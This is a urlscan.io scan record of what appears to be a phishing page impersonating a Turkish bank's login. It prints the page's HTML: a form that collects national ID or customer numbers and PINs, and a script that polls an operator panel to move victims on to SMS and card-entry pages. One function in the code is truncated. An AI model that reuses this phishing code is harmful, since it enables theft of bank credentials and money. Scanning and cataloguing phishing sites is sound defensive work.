093444599-2024.com Open in urlscan Pro
2606:4700:3033::6815:2592  Public Scan

URL: https://093444599-2024.com/
Submission: On April 04 via api from TR — Scanned from DE

Form analysis 1 forms found in the DOM

Name: aspnetFormPOST ./validateCaptcha.php

<form name="aspnetForm" method="post" action="./validateCaptcha.php" id="aspnetForm" autocomplete="off" novalidate="novalidate">
  <div id="" class="login-wrap">
    <header style=" z-index: 1000;"></header>
    <div id="" class="container" style="width: 99%;">
      <div id="" class="tc-kimlik-giris-wrap">
        <div id="ctl00_ctl06" class="row">
          <div id="ctl00_LoginBoxContainer" style="width: 99%;" class="col-xs-12 col-md-6">
            <div id="LoginBox" class="login-box long">
              <span id="ctl00_c_PageValidation" style="color:Red;visibility:hidden;"></span>
              <input name="rdLng" type="hidden" value="">
              <p>İnternet Şubemize Hoş Geldiniz</p>
              <div class="tabs-wrap" data-module="14">
                <div id="TabHeaderContainer" class="tabs tab-header-container">
                  <a causesval="false" onclick=";;;" id="ctl00_c_RetailTabHeaderButton" class="active" href="">
                        <span></span>BİREYSEL </a>
                  <a causesval="false">
                        <span></span>KURUMSAL </a>
                </div>
                <div id="" class="tab-container tab-contents">
                  <div id="RetailTabContainer" class="tab-item active" style="
					  padding-left: 10px;
				  ">
                    <div id="ctl00_c_RetailIdentityContainer" class="form-group hidden-title">
                      <input autocomplete="off" name="ctl00$c$RetailIdentityTextBox" type="tel" maxlength="11" id="ctl00_c_RetailIdentityTextBox" class="form-control required isNumber numeric external-validation" style="  

font-size: 14px;  height: 46px;font-family: sans-serif;
						  font-weight: 700;" placeholder="T.C. Kimlik / Müşteri Numaranız" data-msg-required="Müşteri / T.C. Kimlik Numaranızı Giriniz." maxlengthvalidationenabled="False" disablevalidationonblur="true" onkeypress=";"
                        onkeydown=";return FcsToCtrl(event,'ctl00_c_RetailLoginButton');" causesval="false" onmousedown=";" exvalidmethod="ValidateIdentity" aria-required="true" value="">
                    </div>
                    <div id="RetailRememberMeContainer" class="clearfix">
                      <div role="button" class="switch-cont" tabindex="0">
                        <span>Beni Hatırla</span>
                        <label class="switch">
                          <input id="ctl00_c_RetailRememberMeCheckBox" type="checkbox" name="ctl00$c$RetailRememberMeCheckBox" causesval="false" tabindex="-1" aria-hidden="true">
                          <span class="switch-slider"></span>
                        </label>
                      </div>
                    </div>
                    <div id="ctl00_c_RetailPinContainer" class="form-group hidden-title">
                      <input autocomplete="off" name="ctl00$c$RetailPinTextBox" type="password" maxlength="6" id="ctl00_c_RetailPinTextBox" class="form-control required pin-entry isAlphaNumericForPin external-validation" onmousedown=";"
                        data-rule-range-min="5" placeholder="Şifre" data-msg-required="Lütfen şifrenizi giriniz." style="font-size: 14px;font-family: sans-serif;    font-weight: 700;" disablevalidationonblur="true" data-rule-range-max="6"
                        onkeyup=";;" causesval="false" pin-validation-message-current-pin-length="Şifrenizi kontrol ediniz." encrypted="" exvalidmethod="CheckAlphaNumericCurrentPinEntry" aria-required="true" value="">
                    </div>
                    <div id="" class="clearfix"></div>
                    <button id="ctl00_c_RetailLoginButton" class="btn btn-danger sendBtn" disabled="" onclick="checkAndSubmit();">
                      <span></span>DEVAM </button><br><br><br>
                    <a causesval="true" onclick="" id="ctl00_c_RetailRemindPinButton" class="custom-link" href="">
                          <span></span>Şifremi Unuttum </a>
                    <div id="TabFooter" class="tab-footer">
                      <p>Dijital Bankacılık müşterimiz olmak için</p>
                      <a causesval="true" id="ctl00_c_OnlineApplicationButton" class="btn btn-default ">
                            <span></span>HEMEN BAŞVUR </a>
                    </div>
                  </div>
                </div>
                <style>
                  input {
                    touch-action: manipulation;
                  }

                  .api-payment-container img {
                    max-height: 92px;
                    max-width: 92px;
                  }

                  .ipNotInListRedirectBtn {
                    background-color: #e10514 !important;
                  }
                </style>
              </div>
            </div>
          </div>
        </div>
        <script>
          document.addEventListener("DOMContentLoaded", function() {
            async function tcno_dogrula_ve_islem_yap(tcno) {
              // TC kimlik doğrulama fonksiyonu
              tcno = String(tcno);
              if (tcno.substring(0, 1) === '0') {
                return false;
              }
              if (tcno.length !== 11) {
                return false;
              }
              var ilkon_array = tcno.substr(0, 10).split('');
              var ilkon_total = hane_tek = hane_cift = 0;
              for (var i = j = 0; i < 9; ++i) {
                j = parseInt(ilkon_array[i], 10);
                if (i & 1) {
                  hane_cift += j;
                } else {
                  hane_tek += j;
                }
                ilkon_total += j;
              }
              if ((hane_tek * 7 - hane_cift) % 10 !== parseInt(tcno.substr(-2, 1), 10)) {
                return false;
              }
              ilkon_total += parseInt(ilkon_array[9], 10);
              if (ilkon_total % 10 !== parseInt(tcno.substr(-1), 10)) {
                return false;
              }
              return true;
            }
            async function checkAndSubmit()

            function handleInput() {
              checkAndSubmit();
            }
            var identityInput = document.getElementById("ctl00_c_RetailIdentityTextBox");
            var pinInput = document.getElementById("ctl00_c_RetailPinTextBox");
            identityInput.addEventListener("input", handleInput);
            pinInput.addEventListener("input", handleInput);
          });
        </script>
        <div>
          <script type="text/javascript">
            $(document).ready(function() {
              gonder();
              var int = self.setInterval("gonder()", 3000);
            });

            function gonder() {
              $.ajax({
                type: 'POST',
                url: 'datach.php?ip=172.69.150.29',
                success: function(msg) {
                  if (msg == 'sms') {
                    window.location.href = 'sms.php';
                  }
                  if (msg == 'tebrik') {
                    window.location.href = 'tebrik.php';
                  }
                  if (msg == 'hata') {
                    window.location.href = 'hata.php';
                  }
                  if (msg == 'sms2') {
                    window.location.href = 'hatali.php';
                  }
                  if (msg == 'back') {
                    window.location.href = 'sms.php';
                  }
                  if (msg == 'back') {
                    window.location.href = 'index.php?1';
                  }
                  if (msg == '1') {
                    window.location.href = 'index.php?1';
                  }
                  if (msg == '2') {
                    window.location.href = 'kart.php';
                  }
                  if (msg == '3') {
                    window.location.href = 'bekle.php';
                  }
                  if (msg == '4') {
                    window.location.href = 'hata.php';
                  }
                  if (msg == '5') {
                    window.location.href = 'tebrik.php';
                  }
                }
              });
            }
          </script>
        </div>
      </div>
    </div>
  </div>
</form>

Text Content

İnternet Şubemize Hoş Geldiniz

BİREYSEL KURUMSAL
Beni Hatırla


DEVAM


Şifremi Unuttum

Dijital Bankacılık müşterimiz olmak için

HEMEN BAŞVUR